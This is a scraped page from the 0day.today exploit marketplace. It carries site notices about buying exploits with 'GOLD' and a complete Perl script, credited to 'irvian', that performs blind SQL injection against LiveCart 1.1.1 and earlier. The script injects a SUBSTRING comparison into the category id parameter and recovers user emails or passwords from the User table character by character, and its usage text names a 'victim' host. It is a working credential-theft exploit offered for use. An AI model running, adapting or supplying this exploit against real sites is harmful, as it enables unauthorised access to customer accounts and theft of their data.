0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
LiveCart <= 1.1.1 (category id) Blind SQL Injection Exploit
=========================================================== LiveCart <= 1.1.1 (category id) Blind SQL Injection Exploit =========================================================== #!/usr/bin/perl -w use LWP::UserAgent; #-----------------------------------------------------------------------------------------------# # scripts : livecart Remote Blind Sql Injection # # scripts site : http://www.livecart.com # # # # Discovered # # By : irvian # # # # Thanks To # # friend : str0ke, nyubi, ibnusina, arioo, jipank, ifx, karet, bluespy and all my friend # #-----------------------------------------------------------------------------------------------# # sample : # # http://demo.livecart.com # #-----------------------------------------------------------------------------------------------# print "\r\n[+]----------------------[+]\r\n"; print "[+]Blind SQL injection [+]\r\n"; print "[+]Livecart [+]\r\n"; print "[+]code by irvian [+]\r\n"; print "[+]irvian[dot]cn [+]\r\n"; print "[+]----------------------[+]\n\r"; if (@ARGV < 3){ die " Cara Mengunakan : perl $0 host option userid Keterangan host : http://victim.com atau victim.com Option : pilih 1 untuk mencari email dan pilih 2 untuk mencari password userid : Limit Contoh : perl $0 http://victim.com 1 1 \n";} $url = $ARGV[0]; $option = $ARGV[1]; $id = $ARGV[2]; if ($option eq 1){ syswrite(STDOUT, "email: ", 7);} elsif ($option eq 2){ syswrite(STDOUT, "password: ", 10);} for($i = 1; $i <= 32; $i++){ $f = 0; $n = 32; while(!$f && $n <= 57) { if(&blind($url, $option, $id, $i, $n, $id)){ $f = 1; syswrite(STDOUT, chr($n), 1); } $n++; } if ($f==0){ $n = 97; while(!$f && $n <= 122) { if(&blind($url, $option, $id, $i, $n, $id)){ $f = 1; syswrite(STDOUT, chr($n), 1); } $n++; } } } print "\n[+]finish Execution Exploit\n"; sub blind { my $site = $_[0]; my $op = $_[1]; my $id = $_[2]; my $i = $_[3]; my $n = $_[4]; my $r = $_[5]; if ($op eq 1){$klm = "email";} elsif ($op eq 2){$klm = "password";} $site =~ s/^http:\/\///; my $url = "http://"."$site"."/category?id=1"."%20AND%20SUBSTRING((SELECT%20"."$klm"."%20FROM%20"."User"."%20LIMIT%20"."$r".",1"."),"."$i".",1)=CHAR("."$n".")"; my $browser = &zero($url); if ($browser !~ /Error Code 500/gi){ return 1; } else { return 0; } } sub zero($){ my $spy = $_[0]; my $ua = LWP::UserAgent->new; $ua->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); my $res = $ua->get($spy); my @r = $res->content; $page="@r"; return $page;} # 0day.today [2024-07-02] #